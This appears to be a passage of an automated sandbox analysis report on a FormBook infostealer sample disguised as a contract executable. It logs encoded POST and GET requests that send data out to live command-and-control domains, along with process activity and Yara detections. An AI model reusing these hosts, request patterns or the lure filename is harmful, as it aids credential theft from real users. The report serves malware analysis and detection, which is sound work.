                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 6f 2f 79 62 64 33 74 59 55 42 4e 44 39 4c 5a 66 62 39 71 4b 45 79 4d 78 4b 50 47 48 78 77 58 58 4d 31 31 78 63 4d 4c 77 74 2f 35 70 7a 62 41 5a 50 2f 38 55 34 71 69 74 4b 62 6b 62 4b 5a 66 2b 6f 69 59 79 57 2f 71 4e 79 56 34 56 49 6c 41 6b 45 6d 6d 2f 4d 37 50 35 2f 70 48 4f 43 64 61 75 71 46 43 34 33 39 53 43 7a 6e 69 75 41 2f 55 73 74 49 70 71 36 64 39 55 6d 79 34 42 38 31 6f 45 61 63 47 4e 72 6e 55 73 33 57 30 31 37 47 67 32 41 34 63 47 52 34 41 31 47 6f 51 43 75 51 52 47 56 5a 65 73 2f 30 32 44 61 31 30 72 44 2f 6c 64 69 4b 6d 2f 53 6f 45 65 4a 71 65 78 79 39 44 33 37 46 7a 78 62 6b 41 4e 59 66 5a 71 46 37 79 78 48 52 71 31 4e 49 4c 39 4b 39 52 57 35 76 51 36 5a 36 57 33 69 34 6d 63 49 55 52 6b 53 78 32 4d 32 6e 4b 30 77 41 49 32 49 6c 6f 52 31 47 7a 6a 6b 30 6a 51 65 54 34 62 4b 4a 38 52 41 76 50 39 49 77 2f 75 45 30 61 4d 47 71 48 43 63 7a 61 45 5a 32 78 61 53 64 62 63 6e 76 32 75 61 2f 55 44 74 7a 6c 72 49 39 36 70 66 62 54 4d 73 42 64 33 57 5a 6d 2f 4e 4a 62 4e 48 6e 6a [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=o/ybd3tYUBND9LZfb9qKEyMxKPGHxwXXM11xcMLwt/5pzbAZP/8U4qitKbkbKZf+oiYyW/qNyV4VIlAkEmm/M7P5/pHOCdauqFC439SCzniuA/UstIpq6d9Umy4B81oEacGNrnUs3W017Gg2A4cGR4A1GoQCuQRGVZes/02Da10rD/ldiKm/SoEeJqexy9D37FzxbkANYfZqF7yxHRq1NIL9K9RW5vQ6Z6W3i4mcIURkSx2M2nK0wAI2IloR1Gzjk0jQeT4bKJ8RAvP9Iw/uE0aMGqHCczaEZ2xaSdbcnv2ua/UDtzlrI96pfbTMsBd3WZm/NJbNHnju9YAiw8KnEtKjCml9IdfHtlb1M4TdPutb1r8HwFDzvyykNjZAYJhTrK1fpZt4eMF6MrjYtSmsejreuea9XG8aoKacMdhHNQtVThBWzgJIuVaanxYqDtjIkPciZXPypQ8qA+Vl5kI4rEKytH3M8tGjzaUlMC5RCVwxOy4z9LwdmCTv/CWdhaNCd5qr7nEbF+d0ANOlvOXa+EOzA6JxztJ4ihcKZEiJCy72vMvM6TYX4lHKYSAji37Fm4VKGlfyRzu95jCo4p9NuFF1oeQk92KDy1MF074TmwnIirsVVmf+ijxDTvN5NXVq5EkDExjX06M+XS+CgnMi13jcNeDAQ+/a9appPFtLENCgOsYhfAx8rQtzP5NwSMb0g7UifMA8YgpVhUtaz06+QvEs39Gma9PM0FT2j2F+UkOd3DtGxz7FM/5Y2cO30zNJKmT/BYbJ1Z/JjE7Syn1uNumMuY3fsmW2W2MD/NEGv2E+7MVIV+UAfTk2z/aoOkZWJtBFRYamzIoAs91MLtVGE1SdbpNaFwWM0eiwxp2Ntvv/w5s/UnLS4UtecJ26D9Us6aCsPQRyHGJbZ12O8Bw/L7QsnLB4MwD9DpI1QigNGF3D3rcf9NmN+3N0FvVdI8XtRNtpPeXVp++U7gI2cX+WcLlz3/Hj/pNTuO9twqO6rH8J+ [TRUNCATED]
                                                                                                                      Nov 1, 2024 09:20:46.584163904 CET1236INHTTP/1.1 200 OK
                                                                                                                      date: Fri, 01 Nov 2024 08:20:45 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1110
                                                                                                                      x-request-id: f57c2983-d418-44f4-baf8-123af857b7ef
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                      set-cookie: parking_session=f57c2983-d418-44f4-baf8-123af857b7ef; expires=Fri, 01 Nov 2024 08:35:46 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 6a 56 32 37 55 72 32 6e 63 65 79 73 58 47 6f 50 30 31 39 41 32 76 57 49 79 58 6f 77 71 33 36 33 32 46 57 2b 39 6e 71 5a 37 71 59 45 59 2f 48 38 66 54 48 65 36 4f 4d 6f 68 6a 2b 49 6b 4d 4e 6f 4d 73 64 73 4e 64 30 51 5a 4c 74 63 36 5a 57 42 77 72 77 46 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 1, 2024 09:20:46.584322929 CET563INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjU3YzI5ODMtZDQxOC00NGY0LWJhZjgtMTIzYWY4NTdiN2VmIiwicGFnZV90aW1lIjoxNzMwNDQ5Mj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      44192.168.2.462942199.59.243.227803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:48.531167984 CET527OUTGET /t7p4/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4= HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.deepfy.xyz
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:20:49.147416115 CET1236INHTTP/1.1 200 OK
                                                                                                                      date: Fri, 01 Nov 2024 08:20:48 GMT
                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                      content-length: 1470
                                                                                                                      x-request-id: ad042518-c7dc-4927-a596-1fc21ea77822
                                                                                                                      cache-control: no-store, max-age=0
                                                                                                                      accept-ch: sec-ch-prefers-color-scheme
                                                                                                                      critical-ch: sec-ch-prefers-color-scheme
                                                                                                                      vary: sec-ch-prefers-color-scheme
                                                                                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a3oOpJnjf7TuHD7GXRsLFGlIQNNofu2e923pTgzW+sjHYqN7IoPdIrbA/IuyWW4qByWJGOJu3t3wueaZtDTziw==
                                                                                                                      set-cookie: parking_session=ad042518-c7dc-4927-a596-1fc21ea77822; expires=Fri, 01 Nov 2024 08:35:49 GMT; path=/
                                                                                                                      connection: close
                                                                                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 61 33 6f 4f 70 4a 6e 6a 66 37 54 75 48 44 37 47 58 52 73 4c 46 47 6c 49 51 4e 4e 6f 66 75 32 65 39 32 33 70 54 67 7a 57 2b 73 6a 48 59 71 4e 37 49 6f 50 64 49 72 62 41 2f 49 75 79 57 57 34 71 42 79 57 4a 47 4f 4a 75 33 74 33 77 75 65 61 5a 74 44 54 7a 69 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_a3oOpJnjf7TuHD7GXRsLFGlIQNNofu2e923pTgzW+sjHYqN7IoPdIrbA/IuyWW4qByWJGOJu3t3wueaZtDTziw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                      Nov 1, 2024 09:20:49.147475958 CET923INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWQwNDI1MTgtYzdkYy00OTI3LWE1OTYtMWZjMjFlYTc3ODIyIiwicGFnZV90aW1lIjoxNzMwNDQ5Mj


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      45192.168.2.462943103.233.82.58803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:54.826970100 CET778OUTPOST /6byd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.cmdh1c.xyz
                                                                                                                      Origin: http://www.cmdh1c.xyz
                                                                                                                      Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                      Content-Length: 203
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 52 4c 4e 68 4d 50 34 50 51 51 4c 52 49 52 56 45 39 72 55 68 79 52 39 4a 55 78 61 70 6d 44 38 34 36 79 66 57 61 71 58 62 70 4e 54 57 54 4e 53 6d 30 41 6d 74 6d 59 53 65 52 63 44 52 41 69 6f 69 62 4b 64 6f 70 45 6b 62 34 54 75 4c 48 45 78 65 32 6c 58 6f 47 34 4f 6b 6d 4e 42 51 44 7a 41 71 56 65 38 46 48 6a 62 34 39 2f 43 59 6e 6d 34 75 4e 4f 66 59 57 63 4b 6d 68 4d 44 48 67 57 4b 63 68 43 51 43 49 67 4c 2f 6d 31 4f 62 59 33 5a 48 57 71 67 7a 44 69 54 58 6e 6d 48 56 4e 72 45 59 62 65 52 5a 67 4d 50 36 78 66 76 30 30 6c 34 7a 48 30 6d 71 53 6e 5a 39 6e 62 2f 67 78 6b 78 57 74 77 3d 3d
                                                                                                                      Data Ascii: sn0PLN=RLNhMP4PQQLRIRVE9rUhyR9JUxapmD846yfWaqXbpNTWTNSm0AmtmYSeRcDRAioibKdopEkb4TuLHExe2lXoG4OkmNBQDzAqVe8FHjb49/CYnm4uNOfYWcKmhMDHgWKchCQCIgL/m1ObY3ZHWqgzDiTXnmHVNrEYbeRZgMP6xfv00l4zH0mqSnZ9nb/gxkxWtw==


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      46192.168.2.462944103.233.82.58803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:20:57.385008097 CET798OUTPOST /6byd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.cmdh1c.xyz
                                                                                                                      Origin: http://www.cmdh1c.xyz
                                                                                                                      Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                      Content-Length: 223
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 52 4c 4e 68 4d 50 34 50 51 51 4c 52 48 52 6c 45 2f 4d 41 68 6e 68 39 4b 59 52 61 70 76 6a 38 43 36 79 54 57 61 72 54 4c 6f 35 2f 57 51 73 69 6d 75 46 53 74 72 34 53 65 61 38 44 55 45 69 6f 70 62 4b 52 4f 70 42 63 62 34 54 71 4c 48 45 42 65 32 57 50 72 55 59 4f 6d 2f 39 42 57 48 7a 41 71 56 65 38 46 48 6e 79 64 39 2f 61 59 6e 79 45 75 58 76 66 62 62 38 4b 6c 6b 4d 44 48 78 47 4b 59 68 43 51 67 49 68 57 71 6d 7a 43 62 59 31 78 48 52 2b 30 30 61 79 54 52 70 47 47 79 4d 62 31 72 63 4f 6b 47 69 71 48 4e 38 64 44 56 38 44 31 70 57 46 48 39 41 6e 39 4f 36 63 32 55 38 6e 4d 66 32 30 4d 41 72 7a 4f 43 4e 36 51 73 32 30 64 32 2f 70 56 2b 41 66 41 3d
                                                                                                                      Data Ascii: sn0PLN=RLNhMP4PQQLRHRlE/MAhnh9KYRapvj8C6yTWarTLo5/WQsimuFStr4Sea8DUEiopbKROpBcb4TqLHEBe2WPrUYOm/9BWHzAqVe8FHnyd9/aYnyEuXvfbb8KlkMDHxGKYhCQgIhWqmzCbY1xHR+00ayTRpGGyMb1rcOkGiqHN8dDV8D1pWFH9An9O6c2U8nMf20MArzOCN6Qs20d2/pV+AfA=


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      47192.168.2.462945103.233.82.58803608C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:21:00.969888926 CET10880OUTPOST /6byd/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.cmdh1c.xyz
                                                                                                                      Origin: http://www.cmdh1c.xyz
                                                                                                                      Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                      Content-Length: 10303
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Data Raw: 73 6e 30 50 4c 4e 3d 52 4c 4e 68 4d 50 34 50 51 51 4c 52 48 52 6c 45 2f 4d 41 68 6e 68 39 4b 59 52 61 70 76 6a 38 43 36 79 54 57 61 72 54 4c 6f 35 33 57 54 65 71 6d 74 69 4f 74 71 34 53 65 42 63 44 56 45 69 6f 30 62 4a 68 4b 70 42 67 68 34 52 69 4c 48 6c 68 65 77 6a 6a 72 4e 6f 4f 6d 69 4e 42 58 44 7a 41 2f 56 65 73 4a 48 6a 57 64 39 2f 61 59 6e 7a 55 75 42 75 66 62 5a 38 4b 6d 68 4d 44 62 67 57 4b 77 68 43 35 58 49 68 43 36 6d 6a 69 62 62 56 42 48 58 4e 63 30 53 79 54 54 71 47 47 71 4d 62 35 30 63 4f 34 4b 69 71 61 61 38 63 37 56 2b 6c 73 2b 54 32 50 4a 57 58 68 4c 71 73 75 6f 35 56 41 46 78 58 38 75 6c 68 50 61 50 35 6b 6d 31 45 6c 38 36 59 42 6d 64 35 67 46 42 64 37 2f 6d 65 41 48 49 32 5a 6e 61 73 74 52 58 45 43 74 78 4c 50 43 4f 45 42 6a 6a 38 42 56 6c 57 4b 54 73 53 55 37 77 4f 79 48 79 46 31 72 37 47 34 6e 4d 68 63 73 4a 30 46 70 74 37 76 66 62 57 6e 75 62 30 30 65 6f 31 5a 46 64 5a 6e 6d 4c 6a 75 4b 6e 75 4e 37 75 6a 61 6a 47 77 79 34 53 31 38 42 43 44 50 41 79 48 7a 53 67 49 76 57 65 51 68 [TRUNCATED]
                                                                                                                      Data Ascii: sn0PLN=RLNhMP4PQQLRHRlE/MAhnh9KYRapvj8C6yTWarTLo53WTeqmtiOtq4SeBcDVEio0bJhKpBgh4RiLHlhewjjrNoOmiNBXDzA/VesJHjWd9/aYnzUuBufbZ8KmhMDbgWKwhC5XIhC6mjibbVBHXNc0SyTTqGGqMb50cO4Kiqaa8c7V+ls+T2PJWXhLqsuo5VAFxX8ulhPaP5km1El86YBmd5gFBd7/meAHI2ZnastRXECtxLPCOEBjj8BVlWKTsSU7wOyHyF1r7G4nMhcsJ0Fpt7vfbWnub00eo1ZFdZnmLjuKnuN7ujajGwy4S18BCDPAyHzSgIvWeQhWgityYf0v5XnqSptdfyGfdlLtOwrq6DNCtbI4OGWxHBEFOMlLjv6MBbpcCyWFzjfpFZ1o9iRkru6AhdzEWzyHPCJvlCMPc/ibevCVB1Hf5bGDW2ysqyK4jk0pHHIz7F8737Ml53WnI+bQYnIF/mOmSWATjRxKx4JWGAEXW4cO/4BmaTL18e1q/fDMy/DFYd9XnexUsAzXw3gtuyYVKk65vyanH0Wv0rDv4NU1xS0yxzfgMDYok8iC8V2aZcmi551sEqmlt5WRkE4hAuqFTsoMLV2R2FbBPcZF/MBmNXMB8nAfJphiQ30olbVL5HzE39UqOvn5JMx7E8hinBf+2d6zgyOuEA5DkFH3omBREBh7TgHqMyt4ULj1F2VruPvNsWXbKoVuwX6yPrn2p2i7ZYzYd3pvJHuuVwCh+aXxVdBZGiexZfNdDX/lgVwmhzSrnLPCkwQxR+p7q28BIw+lLzR6nyFtT/61vhvtE4Lh7WXDzJ2WK6Deuks3PTBi43VlP8NDjVlAeImlCgluUSHBBJZ2HHFc17xfRxKVmDXNJzYQhUsKAmRnfbn3m8rtMjwrKTSpUvelI4s/obbsEvnz3n6hWDHHtpqOR5qIhE35gHU3Pf1NlHjLusq6bMWtf3JsDZTomCNdp6CDqy29SCuYNjynKXHi07uk/Ov33 [TRUNCATED]


                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                      48192.168.2.462946103.233.82.5880
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      Nov 1, 2024 09:21:03.859931946 CET527OUTGET /6byd/?sn0PLN=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Accept-Language: en-US
                                                                                                                      Host: www.cmdh1c.xyz
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                      Nov 1, 2024 09:21:05.510509968 CET320INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Fri, 01 Nov 2024 08:20:57 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Content-Length: 162
                                                                                                                      Connection: close
                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:04:16:54
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\draft contract for order #782334.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\draft contract for order #782334.exe"
                                                                                                                      Imagebase:0xd20000
                                                                                                                      File size:751'104 bytes
                                                                                                                      MD5 hash:DAB7306BAF4C0E52D2357F48B7A12911
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:04:17:03
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Users\user\Desktop\draft contract for order #782334.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\draft contract for order #782334.exe"
                                                                                                                      Imagebase:0xbc0000
                                                                                                                      File size:751'104 bytes
                                                                                                                      MD5 hash:DAB7306BAF4C0E52D2357F48B7A12911
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2090221764.0000000001390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2089848989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2091993107.0000000001B20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:6
                                                                                                                      Start time:04:17:29
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe"
                                                                                                                      Imagebase:0x9d0000
                                                                                                                      File size:140'800 bytes
                                                                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4135546380.0000000002FA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      General

                                                                                                                      Target ID:7
                                                                                                                      Start time:04:17:31
                                                                                                                      Start date:01/11/2024
                                                                                                                      Path:C:\Windows\SysWOW64\PATHPING.EXE
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Windows\SysWOW64\PATHPING.EXE"
                                                                                                                      Imagebase:0x440000
                                                                                                                      File size:16'896 bytes
                                                                                                                      MD5 hash:078AD26F906EF2AC1661FCAC84084256
                                                                                                                      Has elevated privileges:false
                                                                                                                      Has administrator privileges:false
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
